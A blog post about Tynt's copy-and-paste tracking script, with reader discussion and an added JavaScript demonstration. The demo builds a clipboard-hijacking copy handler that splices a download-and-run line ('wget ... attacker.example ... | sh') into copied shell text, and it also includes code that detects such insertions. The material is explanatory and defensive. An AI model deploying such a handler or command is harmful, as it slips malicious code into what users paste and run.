Messing With Copy/Paste Could Present Security Issues
from the just-let-copy-and-paste-work dept
John Gruber recently highlighted one of the more annoying things I’ve seen on multiple news websites lately: attempts to muck with basic copy & paste features. I’ve noticed it on Wired.com and SFGate.com among others. Gruber points out that it’s also happening on TechCrunch and The New Yorker’s website. From a user’s standpoint, what happens is this: you copy some text, paste it somewhere else, and find that a bit of JavaScript on the page has appended extra text you did not copy, usually something like “read more:” followed by a URL linking back to the original story.
As someone who does a fair bit of copying and pasting in writing this blog, I agree with Gruber that this is a bit of a nuisance. It’s not a hugely annoying thing, but it is annoying. If I’m copying and pasting from your website, I know what your website is, and I am already planning to link back to it. Adding that superfluous text is just annoying and basically forcing my computer to do something I did not ask it to do.
Gruber tracked down the source of this annoyance: a company called Tynt, which not only enables this functionality for a bunch of sites that probably don’t realize how annoying it is, but also tracks what you copy by sending that info back to its server. That’s a bit creepy, frankly. Of course, since it’s JavaScript, it’s easy enough to block for those who know how to do that sort of thing. Still, Gruber’s analysis of this makes sense:
It’s a bunch of user-hostile SEO bullshit.
Everyone knows how copy and paste works. You select text. You copy. When you paste, what you get is exactly what you selected. The core product of the “copy/paste company” is a service that breaks copy and paste.
The pitch from Tynt to publishers is that their clipboard jiggery-pokery allows publishers to track where text copied from their website is being used, on the assumption that whoever is pasting the text is leaving the Tynt-inserted attribution URL, with its gibberish-looking tracking ID. This is, I believe, a dubious assumption. Who, when they paste such text and find this “Read more:” attribution line appended, doesn’t just delete it (and wonder how it got there)?
However, it may be even worse than that. Michael Scott points us to another analysis of this same issue, by Lance Cottrell, which highlights how breaking basic copy/paste functionality may be a security risk as well:
Imagine a site with sample code which (when copied) inserted some damaging code into the middle of a large block.
I am worried that this capability exists at all within browsers. It seems like a major security vulnerability to me.
Bad things happen when you break basic functionality to shove in fun marketing tricks and spy tactics.
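As an added illustration (this is not Tynt’s script, nor code from the article, from Gruber or from Cottrell), the handler below shows the mechanism described above: a page script intercepts the copy event and rewrites what lands on the clipboard, either appending a “Read more:” line or, in the case Cottrell worries about, splicing a line into the middle of a copied code block. It also shows the check the receiving side can make. The page URL, the tracking-id format, the payload strings and the Node-side stand-in for the browser’s ClipboardEvent are all assumptions for the demo; browsers that refuse script writes to the clipboard during copy need a different trick, which this example does not model.

```javascript
// Added example, not Tynt's code and not from the article: a copy-event
// handler that rewrites the clipboard, plus the check the receiving side can
// run. Runs under Node; in a browser the handler would be registered with
//   document.addEventListener("copy", makeCopyHijacker(transform, () =>
//     String(window.getSelection())));

// Build a copy handler that replaces the clipboard payload with transform(selection).
// getSelectionText is injected so the logic is testable without a DOM.
function makeCopyHijacker(transform, getSelectionText) {
  return function onCopy(event) {
    const selected = getSelectionText();
    if (!selected) return;                  // nothing selected: leave the default copy alone
    event.clipboardData.setData("text/plain", transform(selected));
    event.preventDefault();                 // otherwise the browser's own copy overwrites ours
  };
}

// The attribution variant the post describes. The "#<id>" fragment is a
// placeholder for the tracking id, not Tynt's real format.
function appendAttribution(pageUrl, trackingId) {
  return (text) => `${text}\n\nRead more: ${pageUrl}#${trackingId}`;
}

// The variant Cottrell describes: splice a payload into a code block after its
// first line, so the tail of the paste looks untouched.
function spliceAfterFirstLine(payload) {
  return (text) => {
    const nl = text.indexOf("\n");
    if (nl === -1) return `${text}\n${payload}`;
    return `${text.slice(0, nl + 1)}${payload}\n${text.slice(nl + 1)}`;
  };
}

// Receiving-side check 1: if only the paste is available, strip a trailing
// "Read more: <url>" line. Cheap, but blind to mid-block insertions.
function stripAttributionTail(pasted) {
  return pasted.replace(/\s*Read more:\s*\S+\s*$/, "");
}

// Receiving-side check 2: given the text that was really selected (a browser
// extension can record it in a capturing copy listener that runs before the
// page's handler) and the pasted text, recover the original and report what
// was inserted. Longest common prefix/suffix; where the inserted text shares
// characters with its neighbours the reported boundaries may shift by those
// characters, but the recovered text is exact for a pure insertion.
function findInjectedText(selected, pasted) {
  let prefix = 0;
  while (prefix < selected.length && prefix < pasted.length &&
         selected[prefix] === pasted[prefix]) prefix++;
  let suffix = 0;
  while (suffix < selected.length - prefix && suffix < pasted.length - prefix &&
         selected[selected.length - 1 - suffix] === pasted[pasted.length - 1 - suffix]) suffix++;
  const clean = pasted.slice(0, prefix) + pasted.slice(pasted.length - suffix);
  return {
    injected: pasted.slice(prefix, pasted.length - suffix),
    clean,
    matchesSelection: clean === selected,   // false means text was replaced, not just inserted
  };
}

// Minimal stand-in for the browser's ClipboardEvent (assumption for the demo).
function fakeCopyEvent() {
  const store = {};
  return {
    clipboardData: {
      setData: (type, value) => { store[type] = value; },
      getData: (type) => store[type] || "",
    },
    defaultPrevented: false,
    preventDefault() { this.defaultPrevented = true; },
  };
}

// Copy a constructed two-line shell snippet through both handlers and check it.
function demo() {
  const selection = "tar xzf release.tgz\ncd release && ./configure";  // constructed sample
  const payload = "wget -qO- https://attacker.example/x | sh";          // constructed sample
  const url = "https://example.com/story";                              // placeholder URL

  const attribEvent = fakeCopyEvent();
  makeCopyHijacker(appendAttribution(url, "abc123"), () => selection)(attribEvent);
  const spliceEvent = fakeCopyEvent();
  makeCopyHijacker(spliceAfterFirstLine(payload), () => selection)(spliceEvent);

  const attributed = attribEvent.clipboardData.getData("text/plain");
  const spliced = spliceEvent.clipboardData.getData("text/plain");
  return {
    selection, payload, attributed, spliced,
    prevented: attribEvent.defaultPrevented && spliceEvent.defaultPrevented,
    stripped: stripAttributionTail(attributed),     // recovers the selection
    attribCheck: findInjectedText(selection, attributed),
    spliceCheck: findInjectedText(selection, spliced),
  };
}

const report = demo();
console.log("appended:", JSON.stringify(report.attribCheck.injected));
console.log("spliced in:", JSON.stringify(report.spliceCheck.injected));
```

The pattern-based strip is what the “paste into Notepad first” habit amounts to, and it only catches the visible tail. The prefix/suffix comparison is the check that actually covers Cottrell’s scenario, and it needs the selection recorded before the page’s handler runs, which is why it belongs in the browser (or an extension) rather than in the application being pasted into.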
Comments on “Messing With Copy/Paste Could Present Security Issues”
Firefox/IE - Disable
Firefox
Tools> Options> Content tab> Uncheck enable Javascript
IE 5.5/6:
Tools> Internet Options> Security> Internet> Custom Level> Disable Active scripting
IE7:
Tools> Options> Security> Internet> Custom level> Scroll down to Scripting and select the radio button to Enable or Disable it. You may also opt for IE7 to Prompt you to allow scripts to run.
Re: Firefox/IE - Disable
That’s nice and all, but if you use ABP, you can also just block anything from http://*.tynt.com/ and that’ll take care of it, too. I also do that for doubleclick.
Re: Firefox/IE - Disable
Or install NoScript. That way you can still run scripts on sites you want to, but stay away from any cross-site scripting like this Tynt (taint?) nonsense.
Re: Re: Firefox/IE - Disable
I haven’t even seen any of this nonsense. Some guy was whining about this on Cnet.com, and I went there with Firefox/Minefield, Opera 10.70, Chrome 7 and IE8…. no problems copying and pasting.
To be clear....
… I don’t think anyone is saying the Tynt implementation is insecure (as annoying as it is), but the fundamental ability for JavaScript to be able to write to the copy/paste buffer could be a problem.
Whack a Taynt
OS News has a decent compilation article on these shenanigans.
Several people have re-posted the /etc/hosts method of blocking tynt (adding the tynt collection server to your hosts file as loopback 127.0.0.1). However I doubt it will take long before Tynt defeats this by hard coding their IPs or using a multitude of different registered host names.
Browser based fixes might also take a simplistic approach to the problem, which could then be circumvented anew.
Sounds like Javascript needs to be gimped thanks to one bunch of money grabbing assholes.
Re: Whack a Taynt
I just added their domain to adblock. Works so far and quick to update if need be.
noscript, again saves the day. Blocking scripting should be the default behavior for all browsers. Yes it would break the web as we know it, and that is a Good Thing.
Re: Re:
Agreed, NoScript is a godsend. I also find that while the right click editing context menu in the browser is disabled, oftentimes the edit selections in the main menu are still functional. But, when all else fails, disable that JavaScript.
Re: Re:
No, it isn’t a good thing. A HELL OF A LOT of the internet relies on scripting, and it is PART OF THE HTML STANDARDS!
Now, should there be some things that scripts aren’t allowed to do? Hell yes, and Mozilla and others are realizing that and BLOCKING those behaviors today.
NoScript
I have similar feelings to @WeNeedHelp. Javascript and active scripting is a huge problem… so disable it. I use a Firefox plugin called NoScript. I can add the domains that I fully trust to a whitelist and things like Tynt to the blacklist of never accepting.
I’ve never had issues with what’s considered “drive-by-scripting” hacks. When I first read your story, I was wondering what the real issue was because I’ve copied and pasted information to send to colleagues and friends from the mentioned websites, but never had anything inserted.
I’ve added Tynt to my “untrusted” list on NoScript and won’t have an issue with them ever.
I really don’t think about it, but if a site’s non-friendly to use, umm – I don’t use it.
I know that’s a – very minor – but quick way to get me to hit the ‘back’ button and proceed on down the search for another hit.
I don’t care, it’s their site – they can block what they want and it’s my choice as to what sites I want to frequent.
But I know if Techdirt blocks copy/paste; then I’ll quickly get annoyed and wander off. But I wonder…. how many more people frequent the site here maybe due to my pasting of articles with a link to the site…
There’s a few I just know offhand to skip over if I see a link on a search, because they are a pain.
NoScript is
NoScript is too much work for the average user.
I am a fairly savvy computer user. Every couple of months I give NoScript a try. I always uninstall it within a day.
Today I decide to try it again after reading this article.
On Techdirt alone I have to make decisions not only about Techdirt.com, but googlesyndication.com, backtype.com, fmpub.net and quantserve.com. Just for this one website. It is more trouble than it is worth. How much time is a user expected to devote to deciphering what is trustworthy and what is not? Even with NoScript, one mistake in allowing the wrong script and you have completely undone all your hard work.
Re: Copy/paste
Am I the only one who first pastes anything from the internet into Notepad? More than once I’ve attempted an internet copy/paste and gotten crap I didn’t want. Even happens with email and word processors today. If the program I am pasting into does not have a paste text only option, I routinely paste into Notepad first. Problem solved.
Re: Re: Copy/paste
I do that. Rocking good way to remove formatting and such.
Re: Re: Copy/paste
I only paste into Notepad if it doesn’t do the right thing at first. Ctrl+Z works in all of my programs, and 75% of the time there is no weird formatting attached.
Re: Not that much work....
I don’t review everything noscript blocks. I simply let it block everything. Sites I frequent usually get unblocked (a two-click operation that can be permanent.) The fact is that most sites work just fine without more work than that.
Sites that require third-party scripting to work are sites I don’t visit much, but should I want to and I’m too busy/lazy to figure out which third party scripts are required, I can temporarily allow all scripts during that visit.
Re: Re: Not that much work....
I totally agree. Those people who struggle so much with NoScript always puzzle me. I’ve got it installed right now and Techdirt works fine with EVERYTHING blocked, so there’s zero need to “decipher” the 200 scripts a site tries to run.
To be quite honest, the more decent sites don’t run hundreds of scripts and you often need only enable a single script for a site to work, if any. At least that’s my experience.
Re: Re: Re: Not that much work....
Eh… not always anymore. On CNN.com, I have to allow scripts from about 10 sites or the site is broken and commenting on stories is broken.
Re: NoScript is
Trust none of them, i.e. do nothing (the default)?
At the most, trust the base site you are on if you trust the author.
Security requires effort, like math, Barbie.
Re: NoScript is
But you only have to do that for a very short time as you explore all your trusted sites.
Sure, I allow techdirt. Google syndication I don’t really need; it’s just ads. Google-analytics is an absolute nono … that’s the click and mouse tracking junk.
I’ve got all my trusted sites allowed and everything else blocked by default.
It’s really not that hard to train a new user to understand it. You teach them to first allow only temporarily the domain they are visiting, and if every thing seems ok, you allow it permanently.
If they accidentally allow all on the page, it’s not worse than browsing without it.
If they are too stupid to right click an icon and permit scripts, get off my computer and go home.
Just get GreaseMonkey
Just get GreaseMonkey and/or AdBlock, better than turning off all JavaScript.
Re: Just get GreaseMonkey
Except that NoScript is a whitelist rather than a blacklist. For AdBlock to deal with this, you would have to either add an exception yourself, or wait for your list to get updated. With NoScript, it’s automatically blocked from the get-go. And if they try tricks like changing domain names or something, that will be blocked too.
This would go one of two ways.
1. The copy/paster was going to add a link back to the original source thus all they’re gonna do is delete the extra bits and put their own link up (which is what I do at my blog).
2. The copy/paster is not going to add a link back to the original source thus all they’re gonna do is delete the extra bits.
So either you’re going to annoy the people who were going to link back anyway or add one extra step to people who weren’t going to link back anyway.
Getting to the point
I think the point of this article is that Javascript and/or browsers should be blocking this kind of manipulation of core technology, and what was once a pretty harmless language making images appear and disappear, and simple little clocks on timers. Javascript’s former purpose, reducing server / bandwidth load by making client computers do the work, isn’t needed anymore, nor is it being used that way. It took on a totally new role without overhauling itself and as a result turned into a huge security nightmare with ActiveX, AJAX, and other companion languages.
Re: Getting to the point
Disagree there, in the beginning Javascript was a liability and a dog. Increased computing power and years of “refining” have soothed the latter.
The troubling part of this is that the AJAX approach (not really a language) is at the heart of many rich media and app-like sites that led to the (now meaningless) term “Web 2.0”.
Javascript and its ilk may show many signs of “suckiness”, but they are the present and the immediate future of countless “home grown” business apps and popular, modern websites.
Fixed it for ya
“Gruber tracked down the source of this annoyance: a company called Taynt.”
Kidding aside, if you’re going to cut/paste anything from a website, always scan the code for unnecessary stuff, whether it’s harmless or harmful, and whack it.
Clean code is happy code.
cbc.ca
cbc.ca does this now as well.
Any security expert will tell anybody who asks that scripts are the doors to the kingdom; disable them or die.
Of course some people will have you believe the contrary so they can show you ads 🙂
Even though there is some virtualization (e.g. ZoneAlarm ForceField) available from anti-virus PACKAGES (see the all caps there: the package, not the scanner), most people don’t even know how to use it. Hint: it can be as easy as ticking a box, but still those virtualization solutions have some leaky points, mainly because they try very hard to be user friendly and security is an afterthought.
Any idea how Tynt sidesteps Firefox’s default disabling of clipboard manipulation by scripts?
Does it just insert a hidden citation and reposition the selection in the interval between selection and copying?
Opt-out
http://www.tynt.com/support/opt-inout/
Also, another side effect is that their JS sometimes has some odd bugs. I had an issue on the TechCrunch site the other day where it was preventing me from copying text that I had typed inside the comment box. If I’m copying and pasting my own text, there’s no conceivable reason why you’d want to muck with that.
I mentioned this on Twitter briefly and the Tynt person said they were working on it. Still, very annoying at times.
Assumptions
Hi Mike,
I just wanted to chime in to say that we respect how users feel about our product and their clipboards. We’re upfront about the opt-out feature – it’s on our homepage.
I’d like to correct the assumptions. We’re not in the business of policing copyright or recording personal identifiable information. We are a social media service that lets publishers benefit from the simplest form of sharing: copy/paste.
We’re sorry it seems creepy on the surface. That’s not the intent, nor do I believe it to be the reality. Again, for those that don’t want their anonymous data collected, they can opt-out – in the same way that you can from ad networks.
As for whether users leave the attribution link in place, many do. Millions per month. I can understand Gruber’s opinion that proper “web etiquette” dictates that we should (and are?) linking back already. That’s not emblematic of the typical internet user (Did you see Danny Sullivan’s piece on how his post was ripped off without attribution?), especially when sharing copied text via email. 70% of sharing happens via email where users are much less inclined to post a backlink.
Outside of email, the links are also left in place to a dramatic degree. These are SEO-friendly links and some publishers are seeing the results that 1000s of new links/month bring them.
As for security, we take that very seriously. We’re listening and taking note.
Thanks,
Jim Hirshfield
VP of Business Development
Tynt Multimedia
Re: Assumptions
Again, for those that don’t want their anonymous data collected, they can opt-out – in the same way that you can from ad networks.
True, I opt out of both in the same way: not letting them onto my computer in the first place. 😉
Re: Assumptions
I just wanted to chime in to say that we respect how users feel about our product and their clipboards. We’re upfront about the opt-out feature – it’s on our homepage.
Oh come on. The vast majority of people this affects will NEVER see YOUR home page. I’ve seen this “feature” on tons of sites, and none of them mention Tynt. Most people have no idea it’s your company doing this.
I’d like to correct the assumptions. We’re not in the business of policing copyright or recording personal identifiable information. We are a social media service that lets publishers benefit from the simplest form of sharing: copy/paste.
By breaking copy/paste?
We’re sorry it seems creepy on the surface. That’s not the intent, nor do I believe it to be the reality. Again, for those that don’t want their anonymous data collected, they can opt-out – in the same way that you can from ad networks.
Again, only if they know about you, but none of the sites using your thing make that clear.
As for whether users leave the attribution link in place, many do. Millions per month. I can understand Gruber’s opinion that proper “web etiquette” dictates that we should (and are?) linking back already. That’s not emblematic of the typical internet user (Did you see Danny Sullivan’s piece on how his post was ripped off without attribution?), especially when sharing copied text via email. 70% of sharing happens via email where users are much less inclined to post a backlink.
First of all, Danny’s thing was TOTALLY different. That was not a case of copy/pasting at all, but the press rewriting his article. That’s a total apples and oranges situation.
And, I’m sorry, but that’s ridiculous to think that most people don’t link back.
Outside of email, the links are also left in place to a dramatic degree. These are SEO-friendly links and some publishers are seeing the results that 1000s of new links/month bring them.
Yeah, you’re picking up SEO from spammers by annoying all people who expect copy and paste to work as it should.
What you’re doing is not a good thing.
It’s really graveling when someone copies your original content from your sites and pastes it to some other place. It’s kinda theft from my point of view, since you are stealing someone’s property…
Re: Re:
Graveling? It’s not theft and they’re not stealing. If they were stealing, you would be missing something after they did it. You still have everything that you had before, so they didn’t steal anything from you. I’m not saying it’s right or legal, only that it’s different from stealing.
Browser flaw being abused
Regardless of how creepy Tynt’s abuse is, this issue boils down to a browser flaw. Javascript should not be allowing access to the users’ text selection. If the only way to remove this is by blocking mouse-down/up events from the browser, so be it.
This wouldn’t be anywhere near the first time a “feature” in javascript was abused horribly to break basic functionality. Who ever thought letting web pages resize and move your browser window was a good idea? Or replacing status bar text (a HUGE security flaw).
I would much rather “approve” extended JS functionality on the few sites that legitimately use it, rather than have everything default to on. Just like Flash doesn’t leave your webcam wide open to every page you visit.
You better believe Tynt and companies like them would be snapping pictures of you with your own webcam if Flash or Javascript let them – it’s up to the web browsers to vigilantly protect us from this sort of abuse, and remove these features once companies or hackers find a way to abuse them.
What Tynt should have done
If Tynt would simply include their name somewhere in the output of the pasted text, then at least it would be more reassuring. But as it stands, most users have no idea how to opt out of this “feature”, so it is hard to believe that no wrongdoing is taking place. When you change basic functionality of the user interface, you need to hold yourself accountable.
Sure you are worm
To Mr Hirshfield,
You and your kind need to be in jail for this sort of behavior on the internet. They stick script kiddies in jail all the time for much less; yet somehow scourge like you seem to be able to avoid wearing a prison number. I wonder why that is Mr Hirshfield?
Only difference between scum like you and hackers is that you somehow manage to get a business license to do your money changing. And for the most part hackers have a sense of ethics to the computer world.
The BS line of people can “opt-out,” doesn’t wash. End users didn’t even know who pond scum like you were until we went looking to figure out who hijacked our clipboards.
One day, you and people like you will stand judgement.
It is my wish you, and parasites like you bear the full brunt of that judgement when it comes.
Have a nice day…
Write your own material.
WTF is wrong with people now-a-days? You are the laziest people. Why copy and paste *cough* steal *cough* other people’s work? If you can’t write an article yourself, close down your f’n site. You sound like a bunch of people that don’t have an original thought to yourself, you have to steal someone else’s.
Write your own material!!!
Re: Write your own material.
If you can’t write an article yourself, close down your f’n site.
You’re right, this site is terrible. You should not visit it again. Find someplace more original, and post your comments there.